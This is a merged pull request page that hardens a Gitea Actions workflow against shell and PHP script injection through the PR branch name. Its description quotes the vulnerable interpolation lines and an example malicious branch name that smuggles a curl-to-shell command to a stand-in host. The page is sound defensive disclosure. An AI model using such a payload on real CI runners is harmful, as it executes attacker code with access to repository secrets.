fix(security): prevent script injection in rc-revert workflow #324

Merged

jmiller merged 2 commits from feature/harden-rc-revert-injection into dev 2026-06-27 02:32:27 +00:00

Conversation 0 Commits 2 Files Changed 39

+57 -52

jmiller commented 2026-06-27 02:31:03 +00:00

Owner

Copy Link

Copy Source

Security fix — GitHub/Gitea Actions script injection (HIGH)

.mokogitea/workflows/rc-revert.yml substituted the attacker-controlled PR head branch ref directly into shell:

BRANCH="${{ github.event.pull_request.head.ref }}"   # template-substituted into shell source
...
ENCODED=$(php -r "echo rawurlencode('${BRANCH}');")  # second injection (PHP)

Git permits chars like `, $, (, ), ;, " in branch names, so a PR from a branch such as rc/";curl evil|sh;" executes arbitrary commands in the runner — with secrets.MOKOGITEA_TOKEN (branch create/delete API access) in scope. Flagged HIGH by automated security review.

Fix

• Untrusted values passed via env: (BRANCH/REPO/GITEA_URL/TOKEN) — available only as already-parsed shell variables, never rendered into workflow shell source.
• Strict allowlist ^rc/[A-Za-z0-9._/-]+$ rejects anything unexpected before use.
• PHP reads the value with getenv("BRANCH") instead of string interpolation (closes the second injection).
• set -euo pipefail added.

Behaviour is unchanged for legitimate rc/<name> branches. The identical inherited copy in mokogitea-private has been hardened the same way.

## Security fix — GitHub/Gitea Actions script injection (HIGH) `.mokogitea/workflows/rc-revert.yml` substituted the **attacker-controlled** PR head branch ref directly into shell: ```yaml BRANCH="${{ github.event.pull_request.head.ref }}" # template-substituted into shell source ... ENCODED=$(php -r "echo rawurlencode('${BRANCH}');") # second injection (PHP) ``` Git permits chars like `` ` ``, `$`, `(`, `)`, `;`, `"` in branch names, so a PR from a branch such as `` rc/";curl evil|sh;" `` executes arbitrary commands in the runner — with `secrets.MOKOGITEA_TOKEN` (branch create/delete API access) in scope. Flagged HIGH by automated security review. ## Fix - Untrusted values passed via `env:` (`BRANCH`/`REPO`/`GITEA_URL`/`TOKEN`) — available only as already-parsed shell variables, never rendered into workflow shell source. - Strict allowlist `^rc/[A-Za-z0-9._/-]+$` rejects anything unexpected before use. - PHP reads the value with `getenv("BRANCH")` instead of string interpolation (closes the second injection). - `set -euo pipefail` added. Behaviour is unchanged for legitimate `rc/<name>` branches. The identical inherited copy in `mokogitea-private` has been hardened the same way.

jmiller added 2 commits 2026-06-27 02:31:03 +00:00

fix(security): prevent shell/PHP script injection in rc-revert workflow ... 5885797728

The PR head branch ref is attacker-controlled and was substituted via
${{ }} directly into the shell run block (and interpolated into php -r),
allowing command injection with secrets.MOKOGITEA_TOKEN in scope.

- Pass untrusted values through env (BRANCH/REPO/GITEA_URL/TOKEN), not
  ${{ }} template substitution into shell source
- Strict allowlist ^rc/[A-Za-z0-9._/-]+$ before any use
- PHP reads BRANCH via getenv() instead of string interpolation

chore(version): auto-bump patch 09.38.05-dev [skip ci] 3972b91169

jmiller merged commit 282a56258c into dev 2026-06-27 02:32:27 +00:00

jmiller deleted branch feature/harden-rc-revert-injection 2026-06-27 02:32:27 +00:00

Sign in to join this conversation.

Reviewers

No Reviewers

Labels

Clear labels

automation

Automated processes or scripts

breaking-change

Breaking API or functionality change

build

Build system changes

ci-cd

CI/CD pipeline changes

config

Configuration file changes

css

CSS/styling changes

dependencies

Dependency updates

deploy-failure

Automated deploy failure tracking

docker

Docker configuration changes

documentation

Documentation changes

dolibarr

Dolibarr module or extension

generic

Generic project or library

good first issue

Good for newcomers

health-check

Repository health check results

health: excellent

Health score 90-100

health: fair

Health score 50-69

health: good

Health score 70-89

health: poor

Health score below 50

help wanted

Extra attention needed

html

HTML template changes

javascript

JavaScript code changes

joomla

Joomla extension or component

mokostandards

MokoStandards compliance

needs-review

Awaiting code review

php

PHP code changes

push-failure

File push failure requiring attention

python

Python code changes

security

Security-related changes

size/l

Large change (101-300 lines)

size/m

Medium change (31-100 lines)

size/s

Small change (11-30 lines)

size/xl

Extra large change (301-1000 lines)

size/xs

Extra small change (1-10 lines)

size/xxl

Extremely large change (1000+ lines)

standards-drift

Repository drifted from MokoStandards

standards-update

MokoStandards sync update

sync-failure

Bulk sync failure requiring attention

sync-report

Bulk sync run report

template-validation-failure

Template workflow validation failure

tests

Test suite changes

type: bug

Something isn't working

type: chore

Maintenance tasks

type: enhancement

Enhancement to existing feature

type: feature

New feature or request

type: refactor

Code refactoring

type: version

Version-related change

typescript

TypeScript code changes

version

Version bump or release

version-drift

Version mismatch detected

work-in-progress

Work in progress, not ready for merge

No labels

Priority -

Type -

Milestone

No items

No Milestone

Assignees

Clear assignees

jmiller (Jonathan Miller)

No Assignees

1 Participants

Notifications

Subscribe

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: MokoConsulting/MokoCLI#324